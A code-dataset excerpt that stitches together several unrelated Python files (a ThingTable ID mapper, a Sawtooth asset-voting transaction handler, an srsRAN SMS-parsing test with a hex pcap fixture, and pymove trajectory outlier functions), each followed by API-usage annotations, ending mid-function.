int_ids = np.array(int_ids, dtype=int)
if len(int_ids.shape) != 1:
raise TypeError(f"Invalid shape {int_ids.shape} for array of integer IDs.")
ret = np.empty(len(int_ids), dtype=object)
for i in range(len(int_ids)):
ret[i] = self.id_to_thing(int_ids[i].item())
return ret
def add_thing(self, thing: Any) -> int:
"""
Adds a thing to the table. Raises a ValueError if the thing is already
present.
:param thing: Thing to add
:return: unique ID for this thing
"""
if not isinstance(thing, self.type_of_thing()):
raise TypeError(f"Expected an object of type {self.type_of_thing()}, "
f"but received an object of type {type(thing)}")
# Box for dictionary compatibility
boxed_thing = self.box(thing)
if boxed_thing in self._boxed_thing_to_id:
raise ValueError(f"'{textwrap.shorten(str(thing), 40)}' already in table")
new_id = len(self._id_to_boxed_thing)
self._id_to_boxed_thing.append(boxed_thing)
self._boxed_thing_to_id[boxed_thing] = new_id
self._total_bytes += self.size_of_thing(thing)
return new_id
def maybe_add_thing(self, thing: Any) -> int:
"""
Adds a thing to the table if it is not already present.
:param thing: Thing to add
:return: unique ID for this thing
"""
if not isinstance(thing, self.type_of_thing()):
raise TypeError(f"Expected an object of type {self.type_of_thing()}, "
f"but received an object of type {type(thing)}")
current_id = self.thing_to_id(thing)
if current_id != ThingTable.NOT_AN_ID:
return current_id
else:
return self.add_thing(thing)
def maybe_add_things(self, s: Sequence[Any]) -> np.ndarray:
"""
Vectorized version of :func:`maybe_add_thing` for translating, and
potentially adding multiple things at once.
:param s: Multiple things to be translated and potentially added
:returns: A numpy array of the corresponding integer IDs for the things.
Adds each things to the table if it is not already present.
"""
result = np.empty(len(s), dtype=np.int32)
for i in range(len(result)):
result[i] = self.maybe_add_thing(s[i])
return result
def nbytes(self):
"""
Number of bytes in a (currently hypothetical) serialized version of this table.
"""
return self._total_bytes
@property
def num_things(self) -> int:
"""
:return: Number of distinct things in the table
"""
return len(self._id_to_boxed_thing)
@property
def things(self) -> Iterator[Any]:
"""
:return: Iterator over the unique things stored in this table.
"""
return (self.unbox(thing) for thing in self._id_to_boxed_thing)
@property
def ids(self) -> Iterator[int]:
"""
:return: Iterator over the IDs of things stored in this table, including the
implicit ID ThingTable.NONE_ID
"""
if ThingTable.NONE_ID != -1:
raise ValueError("Someone has changed the value of NONE_ID; need to rewrite "
"this function.")
return range(-1, len(self._id_to_boxed_thing))
def things_to_ids(self, things: Sequence[Any]) -> np.ndarray:
"""
Vectorized version of :func:`thing_to_id` for translating multiple things
at once.
:param things: Multiple things to be translated to IDs. Must be already
in the table's set of things.
:returns: A numpy array of the same integers that :func:`thing_to_id` would
return.
"""
ret = np.empty(len(things), dtype=np.int32)
for i in range(len(things)):
ret[i] = self.thing_to_id(things[i])
return ret
| [
"numpy.array",
"numpy.empty_like"
] | [((5071, 5104), 'numpy.empty_like', 'np.empty_like', (['old_ids'], {'dtype': 'int'}), '(old_ids, dtype=int)\n', (5084, 5104), True, 'import numpy as np\n'), ((9024, 9052), 'numpy.array', 'np.array', (['int_ids'], {'dtype': 'int'}), '(int_ids, dtype=int)\n', (9032, 9052), True, 'import numpy as np\n')] |
# ------------------------------------------------------------------------------
# Copyright 2018 <NAME> and <NAME>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ------------------------------------------------------------------------------
import logging
from sawtooth_sdk.processor.handler import TransactionHandler
from sawtooth_sdk.messaging.future import FutureTimeoutError
from sawtooth_sdk.processor.exceptions import InvalidTransaction
from sawtooth_sdk.processor.exceptions import InternalError
from protobuf.setting_pb2 import Settings
from protobuf.asset_pb2 import (
Asset, AssetPayload, AssetProposal,
AssetVote, AssetCandidate, AssetCandidates)
from modules.address import Address
LOGGER = logging.getLogger(__name__)
# Number of seconds to wait for state operations to succeed
STATE_TIMEOUT_SEC = 10
class AssetTransactionHandler(TransactionHandler):
def __init__(self):
self._addresser = Address.asset_addresser()
self._auth_list = None
self._action = None
self._settings = None
@property
def addresser(self):
return self._addresser
@property
def family_name(self):
return self.addresser.family_ns_name
@property
def family_versions(self):
return self.addresser.family_versions
@property
def namespaces(self):
return [self.addresser.family_ns_hash]
@property
def settings(self):
return self._settings
@settings.setter
def settings(self, settings):
self._settings = settings
def asset_address(self, asset):
return self.addresser.asset_address(
asset.system,
asset.key,
asset.value)
def apply(self, transaction, context):
txn_header = transaction.header
public_key = txn_header.signer_public_key
asset_payload = AssetPayload()
asset_payload.ParseFromString(transaction.payload)
auth_keys = self._get_auth_keys(context)
if auth_keys and public_key not in auth_keys:
raise InvalidTransaction(
'{} is not authorized to change asset'.format(public_key))
if asset_payload.action == AssetPayload.ACTION_GENESIS:
asset = Asset()
asset.ParseFromString(asset_payload.data)
_set_asset(context, self.asset_address(asset), asset)
elif asset_payload.action == AssetPayload.ACTION_DIRECT:
asset = Asset()
asset.ParseFromString(asset_payload.data)
_set_asset(context, self.asset_address(asset), asset)
elif asset_payload.action == AssetPayload.ACTION_PROPOSE:
return self._apply_proposal(
public_key,
asset_payload.data,
context)
elif asset_payload.action == AssetPayload.ACTION_VOTE:
return self._apply_vote(
public_key,
auth_keys,
asset_payload.data,
context)
elif asset_payload.action == AssetPayload.ACTION_UNSET:
return self._apply_unset_vote(
public_key,
auth_keys,
asset_payload.data,
context)
else:
raise InvalidTransaction(
"'Payload action not recognized {}".
format(asset_payload.action))
def _apply_proposal(self, public_key, proposal_data, context):
asset_proposal = AssetProposal()
asset_proposal.ParseFromString(proposal_data)
asset = Asset()
asset.ParseFromString(asset_proposal.asset)
proposal_id = self.asset_address(asset)
approval_threshold = self._get_approval_threshold(context)
if approval_threshold > 1:
asset_candidates = self._get_candidates(context)
existing_candidate = _first(
asset_candidates.candidates,
lambda candidate: candidate.proposal_id == proposal_id)
if existing_candidate is not None:
raise InvalidTransaction(
'Duplicate proposal for {}'.format(
asset_proposal.type))
record = AssetCandidate.VoteRecord(
public_key=public_key,
vote=AssetCandidate.VoteRecord.VOTE_ACCEPT)
asset_candidates.candidates.add(
proposal_id=proposal_id,
proposal=asset_proposal,
votes=[record])
self._set_candidates(context, asset_candidates)
else:
_set_asset(context, proposal_id, asset)
LOGGER.debug('Set asset {}'.format(proposal_id))
def _apply_unset_vote(
self, public_key, authorized_keys, vote_data, context):
"""Apply an UNSET vote on a proposal"""
asset_vote = AssetVote()
asset_vote.ParseFromString(vote_data)
proposal_id = asset_vote.proposal_id
# Find the candidate based on proposal_id
asset_candidates = self._get_candidates(context)
candidate = _first(
asset_candidates.candidates,
lambda candidate: candidate.proposal_id == proposal_id)
if candidate is None:
raise InvalidTransaction(
"Proposal {} does not exist.".format(proposal_id))
vote_record = _first(candidate.votes,
lambda record: record.public_key == public_key)
if vote_record is None:
raise InvalidTransaction(
'{} has not voted'.format(public_key))
vote_index = _index_of(candidate.votes, vote_record)
candidate_index = _index_of(asset_candidates.candidates, candidate)
# Delete the vote from the votes collection
del candidate.votes[vote_index]
# Test if there are still votes and save if so,
# else delete the candidate as well
if len(candidate.votes) == 0:
LOGGER.debug("No votes remain for proposal... removing")
del asset_candidates.candidates[candidate_index]
else:
LOGGER.debug("Votes remain for proposal... preserving")
self._set_candidates(context, asset_candidates)
def _apply_vote(self, public_key, authorized_keys, vote_data, context):
"""Apply an ACCEPT or REJECT vote to a proposal"""
asset_vote = AssetVote()
asset_vote.ParseFromString(vote_data)
proposal_id = asset_vote.proposal_id
asset_candidates = self._get_candidates(context)
candidate = _first(
asset_candidates.candidates,
lambda candidate: candidate.proposal_id == proposal_id)
if candidate is None:
raise InvalidTransaction(
"Proposal {} does not exist.".format(proposal_id))
approval_threshold = self._get_approval_threshold(context)
vote_record = _first(candidate.votes,
lambda record: record.public_key == public_key)
if vote_record is not None:
raise InvalidTransaction(
'{} has already voted'.format(public_key))
candidate_index = _index_of(asset_candidates.candidates, candidate)
candidate.votes.add(
public_key=public_key,
vote=asset_vote.vote)
accepted_count = 0
rejected_count = 0
for vote_record in candidate.votes:
if vote_record.vote == AssetVote.VOTE_ACCEPT:
accepted_count += 1
elif vote_record.vote == AssetVote.VOTE_REJECT:
rejected_count += 1
LOGGER.debug(
"Vote tally accepted {} rejected {}"
.format(accepted_count, rejected_count))
asset = Asset()
asset.ParseFromString(candidate.proposal.asset)
if accepted_count >= approval_threshold:
_set_asset(context, proposal_id, asset)
LOGGER.debug("Consensus to create {}".format(proposal_id))
del asset_candidates.candidates[candidate_index]
self._set_candidates(context, asset_candidates)
elif rejected_count >= approval_threshold or \
(rejected_count + accepted_count) == len(authorized_keys):
LOGGER.debug(
'Proposal for {} was rejected'.format(proposal_id))
del asset_candidates.candidates[candidate_index]
self._set_candidates(context, asset_candidates)
else:
LOGGER.debug('Vote recorded for {}'.format(proposal_id))
self._set_candidates(context, asset_candidates)
def _get_candidates(self, context):
"""Get the candidate container from state.
"""
candidates = _get_candidates(
context,
self.addresser.candidate_address)
if not candidates:
raise InvalidTransaction(
'Candidates for {} '
'must exist.'.format(self.dimension))
return candidates
def _set_candidates(self, context, candidates):
_set_candidates(
context,
self.addresser.candidate_address,
candidates)
def _get_auth_keys(self, context):
"""Retrieve the authorization keys for units"""
if not self.settings:
self.settings = _get_setting(
context,
self.addresser.setting_address)
if self.settings and self.settings.auth_list:
return _string_tolist(self.settings.auth_list)
else:
raise InvalidTransaction(
'Asset auth_list settings does not exist')
def _get_approval_threshold(self, context):
"""Retrieve the threshold setting for units"""
if not self.settings:
self.settings = _get_setting(
context,
self.addresser.setting_address)
if self.settings and self.settings.threshold:
return int(self.settings.threshold)
else:
raise InvalidTransaction(
'Asset threshold settings does not exist.')
def _get_setting(context, address, default_value=None):
"""Get a hashblock settings from the block
"""
setting = Settings()
results = _get_state(context, address)
if results:
setting.ParseFromString(results[0].data)
return setting
return default_value
def _get_candidates(context, address, default_value=None):
candidates = AssetCandidates()
results = _get_state(context, address)
if results:
candidates.ParseFromString(results[0].data)
return candidates
def _set_candidates(context, address, candidates):
addresses = _set_state(context, address, candidates)
if len(addresses) != 1:
LOGGER.warning(
'Failed to save candidates on address %s', address)
raise InternalError(
'Unable to save candidate block value {}'.format(candidates))
def _set_asset(context, address, asset):
# Use address to see if entry type exists
# If exists, update with current type entry
# set entry
# Get an empty from the type
# Get the address and pass to _get_asset_entry
addresses = _set_state(context, address, asset)
if len(addresses) != 1:
LOGGER.warning(
'Failed to save value on address %s', address)
raise InternalError(
'Unable to save asset {}'.format(address))
context.add_event(
event_type="hashbloc.asset/update",
attributes=[("updated", address)])
def _get_state(context, address):
try:
results = context.get_state([address], timeout=STATE_TIMEOUT_SEC)
except FutureTimeoutError:
raise InternalError('State timeout: Unable to get {}'.format(address))
return results
def _set_state(context, address, entity):
try:
result = context.set_state(
{address: entity.SerializeToString()},
timeout=STATE_TIMEOUT_SEC)
except FutureTimeoutError:
raise InternalError('State timeout: Unable to set {}'.format(entity))
addresses = list(result)
return addresses
def _string_tolist(s):
"""Convert the authorization comma separated string to list
"""
return [v.strip() for v in s.split(',') if v]
def _first(a_list, pred):
return next((x for x in a_list if pred(x)), None)
def _index_of(iterable, obj):
return next((i for i, x in enumerate(iterable) if x == obj), -1)
| [
"logging.getLogger",
"protobuf.asset_pb2.AssetCandidates",
"protobuf.setting_pb2.Settings",
"protobuf.asset_pb2.AssetVote",
"protobuf.asset_pb2.AssetPayload",
"sawtooth_sdk.processor.exceptions.InvalidTransaction",
"protobuf.asset_pb2.Asset",
"protobuf.asset_pb2.AssetCandidate.VoteRecord",
"modules.... | [((1219, 1246), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (1236, 1246), False, 'import logging\n'), ((10687, 10697), 'protobuf.setting_pb2.Settings', 'Settings', ([], {}), '()\n', (10695, 10697), False, 'from protobuf.setting_pb2 import Settings\n'), ((10932, 10949), 'protobuf.asset_pb2.AssetCandidates', 'AssetCandidates', ([], {}), '()\n', (10947, 10949), False, 'from protobuf.asset_pb2 import Asset, AssetPayload, AssetProposal, AssetVote, AssetCandidate, AssetCandidates\n'), ((1435, 1460), 'modules.address.Address.asset_addresser', 'Address.asset_addresser', ([], {}), '()\n', (1458, 1460), False, 'from modules.address import Address\n'), ((2361, 2375), 'protobuf.asset_pb2.AssetPayload', 'AssetPayload', ([], {}), '()\n', (2373, 2375), False, 'from protobuf.asset_pb2 import Asset, AssetPayload, AssetProposal, AssetVote, AssetCandidate, AssetCandidates\n'), ((3958, 3973), 'protobuf.asset_pb2.AssetProposal', 'AssetProposal', ([], {}), '()\n', (3971, 3973), False, 'from protobuf.asset_pb2 import Asset, AssetPayload, AssetProposal, AssetVote, AssetCandidate, AssetCandidates\n'), ((4044, 4051), 'protobuf.asset_pb2.Asset', 'Asset', ([], {}), '()\n', (4049, 4051), False, 'from protobuf.asset_pb2 import Asset, AssetPayload, AssetProposal, AssetVote, AssetCandidate, AssetCandidates\n'), ((5325, 5336), 'protobuf.asset_pb2.AssetVote', 'AssetVote', ([], {}), '()\n', (5334, 5336), False, 'from protobuf.asset_pb2 import Asset, AssetPayload, AssetProposal, AssetVote, AssetCandidate, AssetCandidates\n'), ((6856, 6867), 'protobuf.asset_pb2.AssetVote', 'AssetVote', ([], {}), '()\n', (6865, 6867), False, 'from protobuf.asset_pb2 import Asset, AssetPayload, AssetProposal, AssetVote, AssetCandidate, AssetCandidates\n'), ((8223, 8230), 'protobuf.asset_pb2.Asset', 'Asset', ([], {}), '()\n', (8228, 8230), False, 'from protobuf.asset_pb2 import Asset, AssetPayload, AssetProposal, AssetVote, AssetCandidate, AssetCandidates\n'), ((2738, 
2745), 'protobuf.asset_pb2.Asset', 'Asset', ([], {}), '()\n', (2743, 2745), False, 'from protobuf.asset_pb2 import Asset, AssetPayload, AssetProposal, AssetVote, AssetCandidate, AssetCandidates\n'), ((4688, 4785), 'protobuf.asset_pb2.AssetCandidate.VoteRecord', 'AssetCandidate.VoteRecord', ([], {'public_key': 'public_key', 'vote': 'AssetCandidate.VoteRecord.VOTE_ACCEPT'}), '(public_key=public_key, vote=AssetCandidate.\n VoteRecord.VOTE_ACCEPT)\n', (4713, 4785), False, 'from protobuf.asset_pb2 import Asset, AssetPayload, AssetProposal, AssetVote, AssetCandidate, AssetCandidates\n'), ((10017, 10078), 'sawtooth_sdk.processor.exceptions.InvalidTransaction', 'InvalidTransaction', (['"""Asset auth_list settings does not exist"""'], {}), "('Asset auth_list settings does not exist')\n", (10035, 10078), False, 'from sawtooth_sdk.processor.exceptions import InvalidTransaction\n'), ((10480, 10542), 'sawtooth_sdk.processor.exceptions.InvalidTransaction', 'InvalidTransaction', (['"""Asset threshold settings does not exist."""'], {}), "('Asset threshold settings does not exist.')\n", (10498, 10542), False, 'from sawtooth_sdk.processor.exceptions import InvalidTransaction\n'), ((2951, 2958), 'protobuf.asset_pb2.Asset', 'Asset', ([], {}), '()\n', (2956, 2958), False, 'from protobuf.asset_pb2 import Asset, AssetPayload, AssetProposal, AssetVote, AssetCandidate, AssetCandidates\n')] |
import datetime
from pyshark import FileCapture
from srsran_controller.uu_events.factory import EventsFactory
from srsran_controller.uu_events.gsm_sms_submit import GSM_SMS_SUBMIT_NAME
GSM_SMS_SUBMIT_PCAP_DATA = (
'0a0d0d0ab80000004d3c2b1a01000000ffffffffffffffff02003500496e74656c28522920436f726528544d292069372d37373030204350'
'55204020332e363047487a20287769746820535345342e3229000000030017004c696e757820352e31312e302d32352d67656e6572696300'
'04003a0044756d70636170202857697265736861726b2920332e322e3320284769742076332e322e33207061636b6167656420617320332e'
'322e332d3129000000000000b80000000100000060000000010000000000040002000b006c74652d6e6574776f726b000900010009000000'
'0b000e000075647020706f7274203538343700000c0017004c696e757820352e31312e302d32352d67656e65726963000000000060000000'
'060000007c0200000000000042c0a016b6cea54859020000590200000242c3b919f70242c0a8340208004500024bb4b7400040119999c0a8'
'3402c0a834fe163716d70237ec996d61632d6c746501000302004a0300000433d007010a000f00013d3a223523461f8000a00000480564e0'
'e28e80e040ec644d2023e0038000d02a7081200ce28021e1922f2a468902acc00000f886f91f8fd26020552504870043806b45000042cb32'
'00004011f356ac10000208080808ef7f0035002e7efdd987010000010000000000000a696e69742d7030316d64056170706c6503636f6d00'
'0041000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'
'0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'
'0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'
'0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'
'0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'
'0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'
'0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'
'000000000000000000000000000000007c020000050000006c00000000000000f1ca05008b4328be01001c00436f756e746572732070726f'
'76696465642062792064756d7063617002000800f1ca0500f83dc6b103000800f1ca0500ef4228be04000800b30000000000000005000800'
'0000000000000000000000006c000000'
)
def test_parsing_gsm_sms_submit(tmp_path):
p = tmp_path / 'gsm_sms_submit.pcap'
p.write_bytes(bytes.fromhex(GSM_SMS_SUBMIT_PCAP_DATA))
with FileCapture(str(p)) as pcap:
submit = list(EventsFactory().from_packet(list(pcap)[0]))[0]
assert submit == {
'event': GSM_SMS_SUBMIT_NAME,
'data': {
'rp_da': '3548900076',
'content': 'Do food',
'tp_da': '972543845166',
},
'rnti': 74,
'time': datetime.datetime(2021, 9, 1, 19, 40, 56, 27320),
}
| [
"datetime.datetime",
"srsran_controller.uu_events.factory.EventsFactory"
] | [((2884, 2932), 'datetime.datetime', 'datetime.datetime', (['(2021)', '(9)', '(1)', '(19)', '(40)', '(56)', '(27320)'], {}), '(2021, 9, 1, 19, 40, 56, 27320)\n', (2901, 2932), False, 'import datetime\n'), ((2605, 2620), 'srsran_controller.uu_events.factory.EventsFactory', 'EventsFactory', ([], {}), '()\n', (2618, 2620), False, 'from srsran_controller.uu_events.factory import EventsFactory\n')] |
"""
Semantic operations.
outliers
create_or_update_out_of_the_bbox,
create_or_update_gps_deactivated_signal,
create_or_update_gps_jump,
create_or_update_short_trajectory,
create_or_update_gps_block_signal,
filter_block_signal_by_repeated_amount_of_points,
filter_block_signal_by_time,
filter_longer_time_to_stop_segment_by_id
"""
from __future__ import annotations
from typing import TYPE_CHECKING
import numpy as np
from pandas import DataFrame
from pymove.preprocessing import filters, segmentation, stay_point_detection
from pymove.utils.constants import (
BLOCK,
DEACTIVATED,
DIST_PREV_TO_NEXT,
DIST_TO_NEXT,
DIST_TO_PREV,
JUMP,
OUT_BBOX,
OUTLIER,
SEGMENT_STOP,
SHORT,
TID_PART,
TIME_TO_PREV,
TRAJ_ID,
)
from pymove.utils.log import logger, timer_decorator
if TYPE_CHECKING:
from pymove.core.dask import DaskMoveDataFrame
from pymove.core.pandas import PandasMoveDataFrame
def _end_create_operation(
    move_data: DataFrame, new_label: str, inplace: bool
) -> DataFrame | None:
    """
    Finish a create/update operation and hand back its result.

    Logs the value counts of the freshly created boolean feature, then
    returns the dataframe only when the caller asked for a copy.

    Parameters
    ----------
    move_data: dataframe
        The input trajectories data.
    new_label: string
        The name of the new boolean feature that was just created.
    inplace : boolean
        if set to true the original dataframe will be altered to contain
        the result of the filtering, otherwise a copy will be returned.

    Returns
    -------
    DataFrame
        The dataframe with the additional feature, or None when ``inplace``
        is True (the caller's dataframe was modified in place).
    """
    # Summary of how many rows were flagged True/False for the new feature.
    logger.debug(move_data[new_label].value_counts())
    if inplace:
        return None
    return move_data
def _process_simple_filter(
    move_data: DataFrame, new_label: str, feature: str, value: float, inplace: bool
) -> DataFrame | None:
    """
    Create a boolean feature by flagging rows matching a threshold filter.

    Every row whose ``feature`` value is at least ``value`` is flagged
    True, together with the row immediately before it (by positional
    index), so each detected event marks both of its endpoints.

    Parameters
    ----------
    move_data: dataframe
        The input trajectories data.
    new_label: string
        The name of the new boolean feature to create.
    feature: string
        Feature column to compare
    value: float
        Value to compare feature
    inplace : boolean
        if set to true the original dataframe will be altered to contain
        the result of the filtering, otherwise a copy will be returned.

    Returns
    -------
    DataFrame
        DataFrame with the additional features or None
    """
    move_data[new_label] = False
    above_threshold = move_data[feature] >= value
    hit_idx = move_data[above_threshold].index
    # Previous row of each hit; NOTE(review): a hit at index 0 yields -1
    # here — presumably callers reset the index first, so -1 never matches
    # an existing label. TODO confirm against call sites.
    prev_idx = hit_idx - np.full(len(hit_idx), 1, dtype=np.int32)
    flagged = np.concatenate([hit_idx, prev_idx], axis=0)
    move_data.at[flagged, new_label] = True
    return _end_create_operation(
        move_data, new_label, inplace
    )
@timer_decorator
def outliers(
    move_data: 'PandasMoveDataFrame' | 'DaskMoveDataFrame',
    jump_coefficient: float = 3.0,
    threshold: float = 1,
    new_label: str = OUTLIER,
    inplace: bool = False
) -> 'PandasMoveDataFrame' | 'DaskMoveDataFrame' | None:
    """
    Create or update a boolean feature to detect outliers.

    A point is flagged as an outlier when all three distance features
    exceed ``threshold`` and the distance to each adjacent point is
    greater than ``jump_coefficient`` times the previous-to-next distance.

    Parameters
    ----------
    move_data : dataframe
        The input trajectory data
    jump_coefficient : float, optional
        by default 3
    threshold : float, optional
        Minimum value that the distance features must have
        in order to be considered outliers, by default 1
    new_label: string, optional
        The name of the new feature with detected outlier points,
        by default OUTLIER
    inplace : bool, optional
        if set to true the original dataframe will be altered to contain
        the result of the filtering, otherwise a copy will be returned, by default False

    Returns
    -------
    DataFrame
        Returns a dataframe with the trajectories outliers or None
    """
    if not inplace:
        move_data = move_data.copy()
    if DIST_TO_PREV not in move_data:
        # Distance features are a precondition for the outlier test.
        move_data.generate_dist_features()
    if move_data.index.name is not None:
        logger.debug('...Reset index for filtering\n')
        move_data.reset_index(inplace=True)
    # BUG FIX: the original condition tested the truthy string constant
    # `DIST_TO_NEXT` instead of checking its presence in the dataframe,
    # so that membership check always passed even when the column was
    # missing. All three columns must actually exist.
    if (
        DIST_TO_PREV in move_data
        and DIST_TO_NEXT in move_data
        and DIST_PREV_TO_NEXT in move_data
    ):
        jump = jump_coefficient * move_data[DIST_PREV_TO_NEXT]
        filter_ = (
            (move_data[DIST_TO_NEXT] > threshold)
            & (move_data[DIST_TO_PREV] > threshold)
            & (move_data[DIST_PREV_TO_NEXT] > threshold)
            & (jump < move_data[DIST_TO_NEXT])
            & (jump < move_data[DIST_TO_PREV])
        )
        move_data[new_label] = filter_
    else:
        logger.warning('...Distances features were not created')
    if not inplace:
        return move_data
@timer_decorator
def create_or_update_out_of_the_bbox(
    move_data: DataFrame,
    bbox: tuple[int, int, int, int],
    new_label: str = OUT_BBOX,
    inplace: bool = False
) -> DataFrame | None:
    """
    Create or update a boolean feature to detect points out of the bbox.

    Parameters
    ----------
    move_data: dataframe
        The input trajectories data.
    bbox : tuple
        Tuple of 4 elements, containing the minimum and maximum values
        of latitude and longitude of the bounding box.
    new_label: string, optional
        The name of the new feature with detected points out of the bbox,
        by default OUT_BBOX
    inplace : boolean, optional
        if set to true the original dataframe will be altered to contain
        the result of the filtering, otherwise a copy will be returned,
        by default False

    Returns
    -------
    DataFrame
        Returns dataframe with a boolean feature with detected
        points out of the bbox, or None

    Raises
    ------
    ValueError
        If feature generation fails
    """
    if not inplace:
        move_data = move_data.copy()
    logger.debug('\nCreate or update boolean feature to detect points out of the bbox')
    # filter_out=True keeps only the points OUTSIDE the bounding box.
    filtered_ = filters.by_bbox(move_data, bbox, filter_out=True)
    if filtered_ is None:
        raise ValueError('Filter bbox failed!')
    logger.debug('...Creating a new label named as %s' % new_label)
    move_data[new_label] = False
    if filtered_.shape[0] > 0:
        # BUG FIX: the original format string was '...Setting % as True\n',
        # where '% a' is parsed as the space flag plus the %a conversion,
        # producing a garbled message instead of the label name.
        logger.debug('...Setting %s as True\n' % new_label)
        move_data.at[filtered_.index, new_label] = True
    return _end_create_operation(
        move_data, new_label, inplace
    )
@timer_decorator
def create_or_update_gps_deactivated_signal(
    move_data: 'PandasMoveDataFrame' | 'DaskMoveDataFrame',
    max_time_between_adj_points: float = 7200,
    new_label: str = DEACTIVATED,
    inplace: bool = False
) -> 'PandasMoveDataFrame' | 'DaskMoveDataFrame' | None:
    """
    Flag points whose time gap suggests the GPS signal was deactivated.
    A point is flagged when the elapsed time since the previous point is
    greater than max_time_between_adj_points.
    Parameters
    ----------
    move_data: dataframe
        The input trajectories data.
    max_time_between_adj_points: float, optional
        The max time between adjacent points, by default 7200
    new_label: string, optional
        The name of the new feature with detected deactivated signals,
        by default DEACTIVATED
    inplace : boolean, optional
        if set to true the original dataframe will be altered to contain
        the result of the filtering, otherwise a copy will be returned,
        by default False
    Returns
    -------
    DataFrame
        DataFrame with the additional features or None
        'time_to_prev', 'time_to_next', 'time_prev_to_next', 'deactivate_signal'
    """
    if not inplace:
        move_data = move_data.copy()
    logger.debug(
        'Create or update deactivated signal if time max > %s seconds\n'
        % max_time_between_adj_points
    )
    # Time-based features must exist before the threshold filter is applied.
    move_data.generate_time_features()
    return _process_simple_filter(
        move_data,
        new_label,
        TIME_TO_PREV,
        max_time_between_adj_points,
        inplace
    )
@timer_decorator
def create_or_update_gps_jump(
    move_data: 'PandasMoveDataFrame' | 'DaskMoveDataFrame',
    max_dist_between_adj_points: float = 3000,
    new_label: str = JUMP,
    inplace: bool = False
) -> 'PandasMoveDataFrame' | 'DaskMoveDataFrame' | None:
    """
    Flag points that represent a GPS jump.
    A point is a jump when its distance to the previous point is greater
    than max_dist_between_adj_points.
    Parameters
    ----------
    move_data: dataframe
        The input trajectories data.
    max_dist_between_adj_points: float, optional
        The maximum distance between adjacent points, by default 3000
    new_label: string, optional
        The name of the new feature with detected deactivated signals, by default GPS_JUMP
    inplace : boolean, optional
        if set to true the original dataframe will be altered to contain
        the result of the filtering, otherwise a copy will be returned,
        by default False
    Returns
    -------
    DataFrame
        DataFrame with the additional features or None
        'dist_to_prev', 'dist_to_next', 'dist_prev_to_next', 'jump'
    """
    if not inplace:
        move_data = move_data.copy()
    logger.debug(
        'Create or update jump if dist max > %s meters\n'
        % max_dist_between_adj_points
    )
    # Distance-based features must exist before the threshold filter is applied.
    move_data.generate_dist_features()
    return _process_simple_filter(
        move_data,
        new_label,
        DIST_TO_PREV,
        max_dist_between_adj_points,
        inplace
    )
@timer_decorator
def create_or_update_short_trajectory(
    move_data: 'PandasMoveDataFrame' | 'DaskMoveDataFrame',
    max_dist_between_adj_points: float = 3000,
    max_time_between_adj_points: float = 7200,
    max_speed_between_adj_points: float = 50,
    k_segment_max: int = 50,
    label_tid: str = TID_PART,
    new_label: str = SHORT,
    inplace: bool = False
) -> 'PandasMoveDataFrame' | 'DaskMoveDataFrame' | None:
    """
    Creates a new feature that inform if point belongs to a short trajectory.
    Parameters
    ----------
    move_data : dataframe
        The input trajectory data
    max_dist_between_adj_points : float, optional
        Specify the maximum distance a point should have from
        the previous point, in order not to be dropped, by default 3000
    max_time_between_adj_points : float, optional
        Specify the maximum travel time between two adjacent points, by default 7200
    max_speed_between_adj_points : float, optional
        Specify the maximum speed of travel between two adjacent points, by default 50
    k_segment_max: int, optional
        Specify the maximum number of segments in the trajectory, by default 50
    label_tid: str, optional
        The label of the column containing the ids of the formed segments,
        by default TID_PART
    new_label: str, optional
        The name of the new feature with short trajectories, by default SHORT
    inplace : boolean, optional
        if set to true the original dataframe will be altered to contain
        the result of the filtering, otherwise a copy will be returned,
        by default False
    Returns
    -------
    DataFrame
        DataFrame with the additional features or None
        'dist_to_prev', 'time_to_prev', 'speed_to_prev', 'tid_part', 'short_traj'
    """
    if not inplace:
        move_data = move_data.copy()
    logger.debug('\nCreate or update short trajectories...')
    # Segment the trajectories in place first, so that every point carries a
    # segment id in `label_tid` before the per-segment size count below.
    segmentation.by_dist_time_speed(
        move_data,
        max_dist_between_adj_points=max_dist_between_adj_points,
        max_time_between_adj_points=max_time_between_adj_points,
        max_speed_between_adj_points=max_speed_between_adj_points,
        label_new_tid=label_tid,
        inplace=True
    )
    move_data[new_label] = False
    # Segments containing at most `k_segment_max` points are flagged as short.
    df_count_tid = move_data.groupby(by=label_tid).size()
    filter_ = df_count_tid <= k_segment_max
    idx = df_count_tid[filter_].index
    move_data.loc[move_data[label_tid].isin(idx), new_label] = True
    return _end_create_operation(
        move_data, new_label, inplace
    )
@timer_decorator
def create_or_update_gps_block_signal(
    move_data: 'PandasMoveDataFrame' | 'DaskMoveDataFrame',
    max_time_stop: float = 7200,
    new_label: str = BLOCK,
    label_tid: str = TID_PART,
    inplace: bool = False
) -> 'PandasMoveDataFrame' | 'DaskMoveDataFrame' | None:
    """
    Creates a new feature that inform segments with periods without moving.
    Parameters
    ----------
    move_data: dataFrame
        The input trajectories data.
    max_time_stop: float, optional
        Maximum time allowed with speed 0, by default 7200
    new_label: string, optional
        The name of the new feature with detected deactivated signals, by default BLOCK
    label_tid : str, optional
        The label of the column containing the ids of the formed segments,
        by default TID_PART
        Is the new slitted id.
    inplace : boolean, optional
        if set to true the original dataframe will be altered to contain
        the result of the filtering, otherwise a copy will be returned,
        by default False
    Returns
    -------
    DataFrame
        DataFrame with the additional features or None
        'dist_to_prev', 'time_to_prev', 'speed_to_prev',
        'tid_dist', 'block_signal'
    """
    if not inplace:
        move_data = move_data.copy()
    message = 'Create or update block_signal if max time stop > %s seconds\n'
    logger.debug(message % max_time_stop)
    # Split with a zero maximum distance: consecutive points at the very same
    # position end up in the same segment, so a segment represents a stop.
    segmentation.by_max_dist(
        move_data,
        max_dist_between_adj_points=0.0,
